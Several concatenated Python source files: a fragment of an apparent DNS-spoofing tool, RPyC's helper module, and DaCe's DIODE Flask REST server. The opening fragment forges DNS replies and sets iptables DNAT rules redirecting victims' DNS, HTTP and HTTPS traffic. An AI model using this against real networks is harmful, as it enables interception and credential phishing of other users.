qr=1, id=requestDNS.id, qd=requestDNSQR, an=responseDNSRR
)
answer = responseIP / responseUDP / responseDNS
send(answer)
except Exception:
pass
def setIptables(self, option=str()):
system(
"iptables -t nat -{} PREROUTING -p udp --dport 53 -j NFQUEUE".format(option)
)
system(
"iptables -{} FORWARD --in-interface {} --jump ACCEPT".format(
option, self.interface
)
)
system(
"iptables -t nat -{} POSTROUTING --out-interface {} --jump MASQUERADE".format(
option, self.interface
)
)
system(
"iptables -t nat -{} PREROUTING -p tcp --dport 80 --jump DNAT --to-destination {}".format(
option, self.redirect
)
)
system(
"iptables -t nat -{} PREROUTING -p tcp --dport 443 --jump DNAT --to-destination {}".format(
option, self.redirect
)
)
system(
"iptables -t nat -{} PREROUTING -i {} -p udp --dport 53 -j DNAT --to {}".format(
option, self.interface, self.redirect
)
)
system(
"iptables -t nat -{} PREROUTING -i {} -p tcp --dport 53 -j DNAT --to {}".format(
option, self.interface, self.redirect
)
)
def stop(self):
print("Stop Thread:" + self.objectName())
self.finished = True
self.setIptables(option="D")
        self.Activated.emit("finished")
|
helpers.py
|
"""
Helpers and wrappers for common RPyC tasks
"""
import time
import threading
from rpyc.lib.colls import WeakValueDict
from rpyc.lib.compat import callable
from rpyc.core.consts import HANDLE_BUFFITER, HANDLE_CALL
from rpyc.core.netref import syncreq, asyncreq
def buffiter(obj, chunk = 10, max_chunk = 1000, factor = 2):
"""Buffered iterator - reads the remote iterator in chunks starting with
*chunk*, multiplying the chunk size by *factor* every time, as an
exponential-backoff, up to a chunk of *max_chunk* size.
``buffiter`` is very useful for tight loops, where you fetch an element
    from the other side with every iteration. Instead of being limited by the
network's latency after every iteration, ``buffiter`` fetches a "chunk"
of elements every time, reducing the amount of network I/Os.
:param obj: An iterable object (supports ``iter()``)
:param chunk: the initial chunk size
:param max_chunk: the maximal chunk size
    :param factor: the factor by which to multiply the chunk size after every
        iteration (up to *max_chunk*). Must be >= 1.
:returns: an iterator
Example::
cursor = db.get_cursor()
for id, name, dob in buffiter(cursor.select("Id", "Name", "DoB")):
print id, name, dob
"""
if factor < 1:
raise ValueError("factor must be >= 1, got %r" % (factor,))
it = iter(obj)
count = chunk
while True:
items = syncreq(it, HANDLE_BUFFITER, count)
count = min(count * factor, max_chunk)
if not items:
break
for elem in items:
yield elem
def restricted(obj, attrs, wattrs = None):
"""Returns a 'restricted' version of an object, i.e., allowing access only to a subset of its
attributes. This is useful when returning a "broad" or "dangerous" object, where you don't
want the other party to have access to all of its attributes.
.. versionadded:: 3.2
:param obj: any object
:param attrs: the set of attributes exposed for reading (``getattr``) or writing (``setattr``).
The same set will serve both for reading and writing, unless wattrs is explicitly
given.
:param wattrs: the set of attributes exposed for writing (``setattr``). If ``None``,
``wattrs`` will default to ``attrs``. To disable setting attributes completely,
set to an empty tuple ``()``.
:returns: a restricted view of the object
Example::
class MyService(rpyc.Service):
def exposed_open(self, filename):
f = open(filename, "r")
return rpyc.restricted(f, {"read", "close"}) # disallow access to `seek` or `write`
"""
if wattrs is None:
wattrs = attrs
class Restricted(object):
def _rpyc_getattr(self, name):
if name not in attrs:
raise AttributeError(name)
return getattr(obj, name)
__getattr__ = _rpyc_getattr
def _rpyc_setattr(self, name, value):
if name not in wattrs:
raise AttributeError(name)
setattr(obj, name, value)
__setattr__ = _rpyc_setattr
return Restricted()
class _Async(object):
"""Creates an async proxy wrapper over an existing proxy. Async proxies
are cached. Invoking an async proxy will return an AsyncResult instead of
blocking"""
__slots__ = ("proxy", "__weakref__")
def __init__(self, proxy):
self.proxy = proxy
def __call__(self, *args, **kwargs):
return asyncreq(self.proxy, HANDLE_CALL, args, tuple(kwargs.items()))
def __repr__(self):
return "async(%r)" % (self.proxy,)
_async_proxies_cache = WeakValueDict()
def async(proxy):
"""
Returns an asynchronous "version" of the given proxy. Invoking the returned
proxy will not block; instead it will return an
:class:`rpyc.core.async.AsyncResult` object that you can test for completion
:param proxy: any **callable** RPyC proxy
:returns: the proxy, wrapped by an asynchronous wrapper
Example::
async_sleep = rpyc.async(conn.modules.time.sleep)
res = async_sleep(5)
.. _async_note:
.. note::
In order to avoid overloading the GC, the returned asynchronous wrapper is
cached as a weak reference. Therefore, do not use::
rpyc.async(foo)(5)
Always store the returned asynchronous wrapper in a variable, e.g. ::
a_foo = rpyc.async(foo)
a_foo(5)
"""
pid = id(proxy)
if pid in _async_proxies_cache:
return _async_proxies_cache[pid]
if not hasattr(proxy, "____conn__") or not hasattr(proxy, "____oid__"):
        raise TypeError("'proxy' must be a Netref: %r" % (proxy,))
if not callable(proxy):
raise TypeError("'proxy' must be callable: %r" % (proxy,))
caller = _Async(proxy)
_async_proxies_cache[id(caller)] = _async_proxies_cache[pid] = caller
return caller
async.__doc__ = _Async.__doc__
class timed(object):
"""Creates a timed asynchronous proxy. Invoking the timed proxy will
run in the background and will raise an :class:`rpyc.core.async.AsyncResultTimeout`
exception if the computation does not terminate within the given time frame
:param proxy: any **callable** RPyC proxy
:param timeout: the maximal number of seconds to allow the operation to run
:returns: a ``timed`` wrapped proxy
Example::
t_sleep = rpyc.timed(conn.modules.time.sleep, 6) # allow up to 6 seconds
t_sleep(4) # okay
t_sleep(8) # will time out and raise AsyncResultTimeout
"""
__slots__ = ("__weakref__", "proxy", "timeout")
def __init__(self, proxy, timeout):
self.proxy = async(proxy)
self.timeout = timeout
def __call__(self, *args, **kwargs):
res = self.proxy(*args, **kwargs)
res.set_expiry(self.timeout)
return res
def __repr__(self):
return "timed(%r, %r)" % (self.proxy.proxy, self.timeout)
class BgServingThread(object):
"""Runs an RPyC server in the background to serve all requests and replies
    that arrive on the given RPyC connection. The thread is started upon
    the instantiation of the ``BgServingThread`` object; you can use the
:meth:`stop` method to stop the server thread
Example::
conn = rpyc.connect(...)
bg_server = BgServingThread(conn)
...
bg_server.stop()
.. note::
For a more detailed explanation of asynchronous operation and the role of the
``BgServingThread``, see :ref:`tut5`
"""
# these numbers are magical...
SERVE_INTERVAL = 0.0
SLEEP_INTERVAL = 0.1
def __init__(self, conn):
self._conn = conn
self._thread = threading.Thread(target = self._bg_server)
self._thread.setDaemon(True)
self._active = True
self._thread.start()
def __del__(self):
if self._active:
self.stop()
def _bg_server(self):
try:
while self._active:
self._conn.serve(self.SERVE_INTERVAL)
time.sleep(self.SLEEP_INTERVAL) # to reduce contention
except Exception:
if self._active:
self._active = False
raise
def stop(self):
"""stop the server thread. once stopped, it cannot be resumed. you will
have to create a new BgServingThread object later."""
assert self._active
self._active = False
self._thread.join()
self._conn = None
|
diode_rest.py
|
#!flask/bin/python
import dace
import dace.serialize
import dace.frontend.octave.parse as octave_frontend
import dace.frontend.python.parser as python_frontend
from diode.optgraph.DaceState import DaceState
from dace.transformation.optimizer import SDFGOptimizer
import inspect
from flask import Flask, Response, request, redirect, url_for, abort, make_response, jsonify, send_from_directory, send_file
import json, copy
import re
from diode.remote_execution import Executor, AsyncExecutor
import traceback, os, threading, queue, time
# Enum imports
from dace.dtypes import AccessType
from dace import ScheduleType, Language, StorageType
app = Flask(__name__)
# Prepare a whitelist of DaCe enumeration types
enum_list = [
typename
for typename, dtype in inspect.getmembers(dace.dtypes, inspect.isclass)
if issubclass(dtype, dace.dtypes.AutoNumber)
]
es_ref = []
config_lock = threading.Lock()
RUNNING_TIMEOUT = 3
class ConfigCopy:
"""
Copied Config for passing by-value
"""
def __init__(self, config_values):
self._config = config_values
def get(self, *key_hierarchy):
current_conf = self._config
for key in key_hierarchy:
current_conf = current_conf[key]
return current_conf
def get_bool(self, *key_hierarchy):
from dace.config import _env2bool
res = self.get(*key_hierarchy)
if isinstance(res, bool):
return res
return _env2bool(str(res))
def set(self, *key_hierarchy, value=None, autosave=False):
raise Exception("ConfigCopy does not allow setting values!")
def save(self, path=None):
""" Nonstatic version of Config::save()
"""
        if path is None:
            # Config is imported lazily; it is only needed to resolve the default path
            from dace.config import Config
            path = Config._cfg_filename
# Write configuration file
with open(path, 'w') as f:
import yaml
yaml.dump(self._config, f, default_flow_style=False)
class ExecutorServer:
"""
Implements a server scheduling execution of dace programs
"""
def __init__(self):
self._command_queue = queue.Queue(
) # Fast command queue. Must be polled often (< 30 ms response time)
self._executor_queue = queue.Queue(
) # Run command queue. Latency not critical
_self = self
def helper():
_self.loop()
def ehelper():
_self.executorLoop()
self._task_dict = {}
self._run_num = 0
self._running = True
self._thread = threading.Thread(target=helper, daemon=True)
self._thread.start()
self._executor_thread = threading.Thread(target=ehelper, daemon=True)
self._executor_thread.start()
self._current_runs = {}
self._orphaned_runs = {}
self._oplock = threading.Lock()
self._run_cv = threading.Condition(
) # Used to trickle run tasks through (as the tasks are run in a thread)
self._slot_available = True # True if the target machine has a slot for running a program
self._perfdata_available = {} # Dict mapping client_id => .can-path
# (NOTE: We do not handle the raw data in DIODE, i.e. no perfdata.db)
# (this may change later)
self._ticket_counter = 0
self._command_results = {} # Dict mapping ticket => command result
def executorLoop(self):
while self._running:
self.consume_programs()
def loop(self):
while self._running:
self.consume()
def waitForCommand(self, ticket):
while True:
try:
with self._oplock:
ret = self._command_results[ticket]
del self._command_results[ticket]
except:
time.sleep(2)
continue
return ret
def addCommand(self, cmd):
import random
with self._oplock:
cmd['ticket'] = self._ticket_counter
self._ticket_counter += 1
self._command_queue.put(cmd)
print("Added command to queue")
return cmd['ticket']
def consume_programs(self):
try:
cmd = self._executor_queue.get(timeout=3)
#print("cmd: " + str(cmd))
if cmd['cmd'] == "run":
while True:
with self._run_cv:
if self._slot_available:
break
import time
time.sleep(0.5)
with self._run_cv:
self._slot_available = False
print("Running task")
self._task_dict[cmd['index']]['state'] = 'running'
runner = self.run(
cmd['cot'], {
'index': cmd['index'],
'config_path': cmd['config_path'],
'client_id': cmd['cid'],
'reset-perfdata': cmd['reset-perfdata'],
'perfopts': cmd['opt']['perfopts']
})
print("Wait for oplock")
with self._oplock:
self._current_runs[cmd['cid']] = runner
import time
# Wait a predefined time for clients to catch up on the outputs
time.sleep(RUNNING_TIMEOUT)
with self._oplock:
run_locally = True
try:
x = self._current_runs[cmd['cid']]
except:
run_locally = False
if run_locally:
print("running locally")
def tmp():
with self._oplock:
del self._current_runs[cmd['cid']]
try:
c = self._orphaned_runs[cmd['cid']]
except:
self._orphaned_runs[cmd['cid']] = []
self._orphaned_runs[cmd['cid']].append([])
print("Starting runner")
for x in runner():
self._orphaned_runs[cmd['cid']][-1] += x
# Because this holds locks (and the output should be generated even if nobody asks for it immediately), this is run when the timeout for direct interception expires
tmp()
elif cmd['cmd'] == 'control':
# Control operations that must be synchronous with execution (e.g. for cleanup, storage operations)
with self._oplock:
self._task_dict[cmd['index']]['state'] = 'running'
if cmd['operation'] == 'startgroup':
from diode.db_scripts.db_setup import db_setup
perf_tmp_dir = ExecutorServer.getPerfdataDir(cmd['cid'])
perfdata_path = os.path.join(perf_tmp_dir, "perfdata.db")
# Clean database and create tables
db_setup(perf_tmp_dir)
elif cmd['operation'] == 'remove_group':
perfdir = ExecutorServer.getPerfdataDir(cmd['cid'])
perfdata_path = os.path.join(perfdir, "perfdata.db")
os.remove(perfdata_path)
                    os.rmdir(perfdir)
elif cmd['operation'] == 'endgroup':
print("Ending group")
from diode.db_scripts.sql_to_json import MergeRuns, Conserver
from dace.config import Config
config_path = cmd['config_path']
with config_lock:
Config.load(config_path)
repetitions = Config.get("execution", "general",
"repetitions")
perf_tmp_dir = ExecutorServer.getPerfdataDir(cmd['cid'])
perfdata_path = os.path.join(perf_tmp_dir, "perfdata.db")
can_path = os.path.join(perf_tmp_dir, 'current.can')
mr = MergeRuns()
mr.mergev2(perfdata_path)
print("Merged into " + perfdata_path)
cons = Conserver()
# TODO: Add sdfgs
cons.conserveAll(
perfdata_path,
can_path,
"",
repetitions,
clear_existing=False)
print("Merged and Conserved!")
self._perfdata_available[cmd['cid']] = can_path
with self._oplock:
del self._task_dict[cmd['index']]
except queue.Empty:
return
def consume(self):
try:
cmd = self._command_queue.get(timeout=3)
if isinstance(cmd, str):
pass
else:
command = cmd['cmd']
print("Got command " + command)
if command == "get_perfdata":
import sqlite3
try:
conn = sqlite3.connect(
self._perfdata_available[cmd['cid']])
except:
self._command_results[cmd[
'ticket']] = "Error: Perfdata not available"
print("Errored-out!")
return
querystring = "SELECT * FROM AnalysisResults "
for_node = cmd['for_node']
for_program = cmd['for_program']
for_supersection = cmd['for_supersection']
for_section = cmd['for_section']
query_list = [('forUnifiedID', for_node), ('forProgram',
for_program),
('forSuperSection', for_supersection),
('forSection', for_section)]
query_values = []
first = True
for x in query_list:
name, val = x
if val is None:
continue
if first:
querystring += " WHERE "
else:
querystring += " AND "
first = False
querystring += name + " = ?"
query_values.append(val)
querystring += ";"
print("querystring: " + str(querystring))
print("tuple: " + str(tuple(query_values)))
c = conn.cursor()
c.execute(querystring, tuple(query_values))
result = c.fetchall()
print("setting result for ticket " + str(cmd['ticket']))
self._command_results[cmd['ticket']] = json.dumps(result)
conn.close()
print("Success reading database")
except queue.Empty:
return
def getExecutionOutput(self, client_id):
import time
ret = None
err_count = 0
while ret is None:
with self._oplock:
try:
ret = self._current_runs[client_id]
del self._current_runs[client_id]
except:
err_count += 1
if err_count < 20: # Give 20 seconds of space for compilation and distribution
time.sleep(1)
continue
def egen():
yield "{'error': 'Failed to get run reference'}"
return egen
return ret
def stop(self):
self._running = False
def lock(self):
self._oplock.acquire()
def unlock(self):
self._oplock.release()
@staticmethod
def getPerfdataDir(client_id):
import tempfile
if not os.path.isdir("perfdata-dir/"):
os.mkdir("perfdata-dir")
tpath = "perfdata-dir/" + client_id
try:
os.mkdir(tpath)
except:
pass
perf_tmp_dir = tpath
return perf_tmp_dir
def addRun(self, client_id, compilation_output_tuple, more_options):
config_path = "./client_configs/" + client_id + ".conf"
if not os.path.isdir("./client_configs/"):
os.mkdir("./client_configs/")
if not os.path.isfile(config_path):
# Config not (yet) available, load default and copy
with config_lock:
from dace.config import Config
Config.load()
Config.save(config_path)
if isinstance(compilation_output_tuple, str):
# Group command
gc = compilation_output_tuple
val = {
'cid': client_id,
'cmd': 'control',
'index': self._run_num,
'operation': None,
'config_path': config_path,
'state': "pending"
}
if gc == "start":
val['operation'] = 'startgroup'
elif gc == "end":
val['operation'] = 'endgroup'
else:
def g():
yield '{ "error": "Unknown group operation" }'
return g
with self._oplock:
self._executor_queue.put(val)
self._task_dict[self._run_num] = val
self._run_num += 1
return
with self._oplock:
val = {
'index': self._run_num,
'type': 'run',
'cid': client_id,
'config_path': config_path,
'cmd': 'run',
'cot': compilation_output_tuple,
'opt': more_options,
'state': 'pending',
'reset-perfdata': False
}
self._executor_queue.put(item=val)
self._task_dict[self._run_num] = val
self._run_num += 1
def error_gen():
yield '{ "error": "Run was scheduled. Please poll until ready or longpoll." }'
return error_gen
def run(self, cot, options):
print("=> Run called")
print("Options: " + str(options))
compilation_output_tuple = cot
runindex = options['index']
config_path = options['config_path']
client_id = options['client_id']
perfopts = options['perfopts']
sdfgs, code_tuples, dace_state = compilation_output_tuple
terminal_queue = queue.Queue()
        # Generator used to pass the serial output through (HTTP/1.1 streaming)
def output_feeder(output):
if isinstance(output, str):
# It's already in a usable format
pass
else:
try:
output = output.decode('utf-8')
except UnicodeDecodeError:
# Try again escaping
output = output.decode('unicode_escape')
terminal_queue.put(output)
def runner():
print("Trying to get lock")
with self._run_cv:
print("Run starting")
perfmode = perfopts['mode']
perfcores = perfopts['core_counts']
with config_lock:
from dace.config import Config
Config.load(config_path)
if perfmode == "noperf":
Config.set(
"instrumentation", "enable_papi", value=False)
else:
Config.set(
"instrumentation", "enable_papi", value=True)
Config.set(
"instrumentation", "papi_mode", value=perfmode)
Config.set(
"instrumentation",
"sql_database_file",
value=ExecutorServer.getPerfdataDir(client_id) +
"/perfdata.db")
Config.set(
"instrumentation",
"thread_nums",
value=str(perfcores))
# Check if perfcounters are available
from dace.codegen.instrumentation.papi import PAPISettings, PerfPAPIInfo
ppi = PerfPAPIInfo()
ppi.load_info()
if not ppi.check_counters(
[PAPISettings.perf_default_papi_counters()]):
yield '{"error": "PAPI Counter check failed. Either your machine does not provide the required counters or /proc/sys/kernel/perf_event_paranoid is not set correctly"}'
del self._task_dict[runindex]
self._slot_available = True
return
# Copy the config - this allows releasing the config lock without suffering from potential side effects
copied_config = ConfigCopy(Config._config)
self._slot_available = False
dace_state.set_is_compiled(False)
async_executor = AsyncExecutor(None, True, None, None)
async_executor.autoquit = True
async_executor.executor.output_generator = output_feeder
async_executor.executor.setConfig(copied_config)
async_executor.run_async(dace_state)
async_executor.to_thread_message_queue.put("forcequit")
while async_executor.running_thread.is_alive():
try:
new = terminal_queue.get(block=True, timeout=1)
yield new
except:
# Check if the thread is still running
continue
with self._oplock:
# Delete from the tasklist
del self._task_dict[runindex]
print("Run done, notifying")
self._slot_available = True
return runner
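# Illustrative sketch (not part of the server): how the ticket-based command flow of
# ExecutorServer is used. addCommand() enqueues a dict on the fast command queue and
# returns a ticket; the background consume() loop stores its result under that ticket;
# waitForCommand() blocks until the result is available. The client id and filter
# values below are placeholders.
def _example_command_roundtrip(es):
    ticket = es.addCommand({
        'cmd': 'get_perfdata',
        'cid': 'example-client',
        'for_node': None,
        'for_program': None,
        'for_supersection': None,
        'for_section': None,
    })
    return es.waitForCommand(ticket)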
@app.route('/')
def redirect_base():
return redirect(url_for("index", path="index.html"), code=301)
@app.route('/client/<path:path>', methods=['GET'])
def index(path):
"""
This is an http server (on the same port as the REST API).
It serves the files from the 'client'-directory to user agents.
Note: This is NOT intended for production environments and security is disregarded!
"""
return send_from_directory("client", path)
@app.route('/dace/api/v1.0/getPubSSH/', methods=['GET'])
def getPubSSH():
try:
with open(os.path.expanduser("~/.ssh/id_rsa.pub")) as f:
key = f.read()
return jsonify({"pubkey": key})
except:
print("Failed to open keyfile")
traceback.print_exc()
return jsonify({"pubkey": "0"})
@app.route('/dace/api/v1.0/getEnum/<string:name>', methods=['GET'])
def getEnum(name):
"""
    Helper function to enumerate the available values of a whitelisted DaCe enum (e.g. `ScheduleType`).
Returns:
enum: List of string-representations of the values in the enum
"""
valid_params = enum_list
if name not in valid_params:
# To protect against arbitrary code execution, this request is refused
print("Enum type '" + str(name) + "' is not in Whitelist")
abort(400)
return jsonify({
'enum': [str(e).split(".")[-1] for e in getattr(dace.dtypes, name)]
})
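# Example (sketch): querying the whitelist-protected enum route above from a client.
# Assumes the server runs on the default Flask port (5000) on localhost and that the
# `requests` package is installed.
def _example_get_enum():
    import requests
    resp = requests.get("http://localhost:5000/dace/api/v1.0/getEnum/ScheduleType")
    return resp.json()["enum"]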
def collect_all_SDFG_nodes(sdfg):
ret = []
for sid, state in enumerate(sdfg.nodes()):
for nid, node in enumerate(state.nodes()):
ret.append(('s' + str(sid) + '_' + str(nid), node))
return ret
def split_nodeid_in_state_and_nodeid(nodeid):
match = re.match(r"s(\d+)_(\d+)", nodeid)
if match:
ids = match.groups()
return int(ids[0]), int(ids[1])
else:
match = re.match(r"dummy_(\d+)", nodeid)
if match:
ids = match.groups()
return int(ids[0]), None
else:
raise ValueError("Node ID " + nodeid + " has the wrong form")
return None
def properties_to_json_list(props):
ret = []
for x, val in props:
try:
typestr = x.dtype.__name__
except:
# Try again, it might be an enum
try:
typestr = x.enum.__name__
except:
typestr = 'None'
# Special case of CodeProperty
if isinstance(x, dace.properties.CodeProperty):
typestr = "CodeProperty"
if val is None:
continue
val = x.to_string(val)
# Special case of DebugInfoProperty: Transcribe to object (this is read-only)
if isinstance(x, dace.properties.DebugInfoProperty):
typestr = "DebugInfo"
if val is None:
continue
nval = {
"filename": val.filename,
"start_line": val.start_line,
"end_line": val.end_line,
"start_col": val.start_column,
"end_col": val.end_column
}
val = json.dumps(nval)
ret.append({
"name": str(x.attr_name),
"desc": str(x.desc),
"type": typestr,
"default": str(x.default),
"value": str(val)
})
return ret
def set_properties_from_json(obj, prop, sdfg=None):
if prop['default'] == "None" and sdfg is None:
# This dropout is only valid for transformations
# Properties without a default are transformation-generic and should not be settable.
pass
else:
# Catching some transcription errors
val = prop['value'] == 'True' if prop['type'] == 'bool' else prop[
'value']
if any(map(lambda x: x in prop['type'], enum_list)):
# This is an enum. If the value was fully qualified, it needs to be trimmed
if '.' in val:
val = val.split('.')[-1]
dace.properties.set_property_from_string(
prop['name'], obj, json.dumps(val), sdfg, from_json=True)
def applySDFGProperty(sdfg, property_element, step=None):
try:
prop_step = int(property_element['step'])
except:
print("[Warning] Prop step was not provided")
prop_step = 0
print("applySDFGProperty: step " + str(step) + ", prop_step: " +
str(prop_step))
if step is not None and prop_step != step:
# Step mismatch; ignore
return sdfg
sid = int(property_element['state_id'])
nid = int(property_element['node_id'])
node = sdfg.find_node(sid, nid)
for prop in property_element['params']:
set_properties_from_json(node, prop, sdfg)
return sdfg
def applySDFGProperties(sdfg, properties, step=None):
for x in properties:
applySDFGProperty(sdfg, x, step)
return sdfg
def applyOptPath(sdfg, optpath, useGlobalSuffix=True, sdfg_props=[]):
# Iterate over the path, applying the transformations
global_counter = {}
if sdfg_props is None: sdfg_props = []
step = 0
for x in optpath:
optimizer = SDFGOptimizer(sdfg, inplace=True)
matching = optimizer.get_pattern_matches()
# Apply properties (will automatically apply by step-matching)
sdfg = applySDFGProperties(sdfg, sdfg_props, step)
for pattern in matching:
name = type(pattern).__name__
if useGlobalSuffix:
if name in global_counter:
global_counter[name] += 1
else:
global_counter[name] = 0
tmp = global_counter[name]
if tmp > 0:
name += "$" + str(tmp)
if name == x['name']:
                for prop in x['params']['props']:
                    # 'subgraph' is set by the optimizer itself and must not be overridden
                    if prop['name'] == 'subgraph':
                        continue
                    set_properties_from_json(pattern, prop, sdfg)
pattern.apply_pattern(sdfg)
if not useGlobalSuffix:
break
step += 1
sdfg = applySDFGProperties(sdfg, sdfg_props, step)
return sdfg
def create_DaceState(code, sdfg_dict, errors):
dace_state = None
try:
dace_state = DaceState(code, "fake.py", headless=True)
for x in dace_state.sdfgs:
name, sdfg = x
sdfg_dict[name] = sdfg
return dace_state
except SyntaxError as se:
# Syntax error
errors.append({
'type': "SyntaxError",
'line': se.lineno,
'offset': se.offset,
'text': se.text,
'msg': se.msg
})
except ValueError as ve:
# DACE-Specific error
tb = traceback.format_exc()
errors.append({
'type': "ValueError",
'stringified': str(ve),
'traceback': tb
})
except Exception as ge:
# Generic exception
tb = traceback.format_exc()
errors.append({
'type': ge.__class__.__name__,
'stringified': str(ge),
'traceback': tb
})
return dace_state
def compileProgram(request, language, perfopts=None):
if not request.json or (('code' not in request.json) and
('sdfg' not in request.json)):
print("[Error] No input code provided, cannot continue")
abort(400)
errors = []
try:
optpath = request.json['optpath']
except:
optpath = None
try:
sdfg_props = request.json['sdfg_props']
except:
sdfg_props = None
if perfopts is None:
try:
perf_mode = request.json['perf_mode']
except:
perf_mode = None
else:
#print("Perfopts: " + str(perfopts))
perf_mode = perfopts
client_id = request.json['client_id']
sdfg_dict = {}
sdfg_eval_order = []
with config_lock: # Lock the config - the config may be modified while holding this lock, but the config MUST be restored.
from dace.config import Config
config_path = "./client_configs/" + client_id + ".conf"
if os.path.isfile(config_path):
Config.load(config_path)
else:
Config.load()
if perf_mode is not None:
tmp = perf_mode['mode']
if tmp != 'noperf':
Config.set(
"instrumentation",
"enable_papi",
value=True,
autosave=False)
Config.set(
"instrumentation",
"papi_mode",
value=perf_mode['mode'],
autosave=False)
print("Set perfmode to " + perf_mode['mode'])
else:
Config.set(
"instrumentation",
"enable_papi",
value=False,
autosave=False)
dace_state = None
in_sdfg = None
if "sdfg" in request.json:
in_sdfg = request.json['sdfg']
if isinstance(in_sdfg, list):
if len(in_sdfg) > 1:
print("More than 1 sdfg provided!")
raise Exception("#TODO: Allow multiple sdfg inputs")
in_sdfg = in_sdfg[0]
if isinstance(in_sdfg, str):
in_sdfg = json.loads(in_sdfg)
if isinstance(in_sdfg, dict):
# Generate callbacks (needed for elements referencing others)
def loader_callback(name: str):
# Check if already available and if yes, return it
if name in sdfg_dict:
return sdfg_dict[name]
# Else: This function has to recreate the given sdfg
sdfg_dict[name] = dace.SDFG.from_json(
in_sdfg[name], {
'sdfg': None,
'callback': loader_callback
})
sdfg_eval_order.append(name)
return sdfg_dict[name]
for k, v in in_sdfg.items():
# Leave it be if the sdfg was already created
# (this might happen with SDFG references)
if k in sdfg_dict: continue
if isinstance(v, str):
v = json.loads(v)
sdfg_dict[k] = dace.SDFG.from_json(
v, {
'sdfg': None,
'callback': loader_callback
})
sdfg_eval_order.append(k)
else:
in_sdfg = dace.SDFG.from_json(in_sdfg)
sdfg_dict[in_sdfg.name] = in_sdfg
else:
print("Using code to compile")
code = request.json['code']
if (isinstance(code, list)):
if len(code) > 1:
print("More than 1 code file provided!")
abort(400)
code = code[0]
if language == "octave":
statements = octave_frontend.parse(code, debug=False)
statements.provide_parents()
statements.specialize()
sdfg = statements.generate_code()
sdfg.set_sourcecode(code, "matlab")
elif language == "dace":
dace_state = create_DaceState(code, sdfg_dict, errors)
# The DaceState uses the variable names in the dace code. This is not useful enough for us, so we translate
copied_dict = {}
for k, v in sdfg_dict.items():
copied_dict[v.name] = v
sdfg_dict = copied_dict
if len(errors) == 0:
if optpath is not None:
for sdfg_name, op in optpath.items():
try:
sp = sdfg_props[sdfg_name]
except:
# In any error case, just ignore the properties
sp = None
print("Applying opts for " + sdfg_name)
print("Dict: " + str(sdfg_dict.keys()))
sdfg_dict[sdfg_name] = applyOptPath(
sdfg_dict[sdfg_name], op, sdfg_props=sp)
code_tuple_dict = {}
# Deep-copy the SDFG (codegen may change the SDFG it operates on)
codegen_sdfgs = copy.deepcopy(sdfg_dict)
codegen_sdfgs_dace_state = copy.deepcopy(sdfg_dict)
if len(errors) == 0:
from dace.codegen import codegen
if sdfg_eval_order != []:
sdfg_eval_order.reverse()
for x in sdfg_eval_order:
s = codegen_sdfgs[x]
code_tuple_dict[x] = codegen.generate_code(s)
else:
for n, s in codegen_sdfgs.items():
code_tuple_dict[n] = codegen.generate_code(s)
if dace_state is None:
if "code" in request.json:
in_code = request.json['code']
else:
in_code = ""
dace_state = DaceState(in_code, "tmp.py", headless=True)
dace_state.set_sdfg(
list(codegen_sdfgs_dace_state.values())[0],
list(codegen_sdfgs_dace_state.keys())[0])
if len(dace_state.errors) > 0:
print("ERRORS: " + str(dace_state.errors))
errors.extend(dace_state.errors)
# The config won't save back on its own, and we don't want it to - these changes are transient
if len(errors) > 0:
return errors
# Only return top-level SDFG
return ({k: v
for k, v in sdfg_dict.items()
if v.parent is None}, code_tuple_dict, dace_state)
#return sdfg_dict, code_tuple_dict, dace_state
def get_transformations(sdfgs):
opt_per_sdfg = {}
for sdfg_name, sdfg in sdfgs.items():
opt = SDFGOptimizer(sdfg)
ptrns = opt.get_pattern_matches()
optimizations = []
for p in ptrns:
label = type(p).__name__
nodeids = []
properties = []
if p is not None:
sid = p.state_id
nodes = list(p.subgraph.values())
for n in nodes:
nodeids.append([sid, n])
properties = dace.serialize.all_properties_to_json(p)
optimizations.append({
'opt_name': label,
'opt_params': properties,
'affects': nodeids,
'children': []
})
opt_per_sdfg[sdfg_name] = {'matching_opts': optimizations}
return opt_per_sdfg
@app.route(
"/dace/api/v1.0/<string:filegroup>/download/<string:client_id>/",
methods=['GET'])
def perfdata_download(filegroup, client_id):
"""
This function returns the perfdata as a download
"""
filepath = ExecutorServer.getPerfdataDir(client_id) + (
"/perfdata.db" if filegroup == "perfdata" else "/current.can")
if not os.path.isfile(filepath):
print("File not existent, cannot download")
abort(400)
return send_file(
filepath,
"application/x-sqlite3",
as_attachment=True,
attachment_filename="perfdata.sqlite3"
if filegroup == "perfdata" else "current.can.sqlite3",
conditional=True)
@app.route("/dace/api/v1.0/<string:filegroup>/reset/", methods=['POST'])
def perfdata_delete(filegroup):
"""
Resets (deletes) the currently accumulated perfdata.
POST-Parameters:
client_id: string. The client id
"""
try:
client_id = request.json['client_id']
except:
print("Client id not specified, cannot continue")
abort(400)
filepath = ExecutorServer.getPerfdataDir(client_id) + (
"/perfdata.db" if filegroup == "perfdata" else "/current.can")
if os.path.isfile(filepath):
os.remove(filepath)
return Response("ok")
@app.route("/dace/api/v1.0/perfdata/roofline/", methods=['POST'])
def perfdata_roofline():
"""
Returns data for roofline from the accumulated data.
POST-Parameters:
client_id: string. The client id
"""
from dace.codegen.instrumentation.papi import PAPIInstrumentation
try:
client_id = request.json['client_id']
except:
print("Client id not specified, cannot continue")
abort(400)
filepath = ExecutorServer.getPerfdataDir(client_id) + "/current.can"
retdict = PAPIInstrumentation.get_roofline_data(filepath)
return jsonify(retdict)
@app.route("/dace/api/v1.0/perfdata/get/", methods=['POST'])
def perfdata_query():
"""
This function returns the matching Analysis results from the latest CAN.
NOTE: It does _not_ return the full raw result list. This differs from DIODE1 behavior
POST-Parameters:
client_id: string. The client id
analysis_name: string. The name of the queried analysis
for_program: string or int. The number of the queried program
for_node: string or int. The id of the node
for_supersection: string or int. The number of the queried supersection
for_section: string or int. The number of the queried section.
The server returns a JSON-dict of all matching values.
Omitting a `for_`-Parameter is allowed and excludes this parameter from the filter (matches anything).
The client id is required.
"""
try:
client_id = request.json['client_id']
except:
print("Client id not specified, cannot continue")
abort(400)
try:
analysis_name = request.json['analysis_name']
except:
analysis_name = None
try:
for_program = request.json['for_program']
except:
for_program = None
try:
for_node = request.json['for_node']
except:
for_node = None
try:
for_supersection = request.json['for_supersection']
except:
for_supersection = None
try:
for_section = request.json['for_section']
except:
for_section = None
es = es_ref[0]
ticket = es.addCommand({
'cmd': 'get_perfdata',
'cid': client_id,
'analysis_name': analysis_name,
'for_program': for_program,
'for_node': for_node,
'for_supersection': for_supersection,
'for_section': for_section
})
    # This should not take too long, so for now, we wait here for the executor to serve the request instead of letting the client poll another address
print("Now waiting for ticket")
